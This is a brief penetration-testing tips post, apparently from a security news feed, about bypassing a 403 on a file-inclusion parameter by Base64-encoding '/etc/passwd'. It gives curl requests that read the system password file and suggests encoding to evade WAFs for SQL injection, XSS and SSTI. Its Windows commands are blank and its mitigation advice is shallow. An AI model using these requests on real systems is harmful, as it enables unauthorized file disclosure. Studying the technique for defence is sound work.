Listen to this Post
In penetration testing, encountering a 403 Forbidden error when accessing sensitive files like `/etc/passwd` is common. However, encoding the file path in Base64 can sometimes bypass this restriction.
Example Exploitation
1. Original Request Blocked:
curl http://example.com/?f=/etc/passwd
Returns 403 Forbidden.
2. Base64-Encoded Bypass:
- Encode `/etc/passwd` in Base64:
echo -n "/etc/passwd" | base64
Output: `L2V0Yy9wYXNzd2Q=`
- Use the encoded payload:
curl http://example.com/?f=L2V0Yy9wYXNzd2Q=
Returns 200 OK, leaking `/etc/passwd`.
You Should Know:
- Applicable Attack Vectors:
- LFI (Local File Inclusion) – Bypass filters.
- SQL Injection – Evade WAFs with encoded payloads.
- XSS/SSTI – Obfuscate malicious input.
-
Automating Base64 Encoding in Linux:
Encode: echo -n "payload" | base64 -w0 Decode (for verification): echo "L2V0Yy9wYXNzd2Q=" | base64 -d
-
Windows Equivalent (PowerShell):
Encode: Decode:
Mitigation:
- Server-Side:
- Reject Base64-encoded input in filters.
- Implement strict allowlists for file access.
- Use mod_security (Apache) or WAFs to detect encoding evasion.
What Undercode Say:
This technique exploits weak input validation. Always sanitize and normalize user input. For defenders, monitor logs for unusual encoding patterns.
Expected Output:
L2V0Yy9wYXNzd2Q=
Relevant URLs:
References:
Reported By: Zlatanh How – Hackers Feeds
Extra Hub: Undercode MoN
Basic Verification: Pass ✅
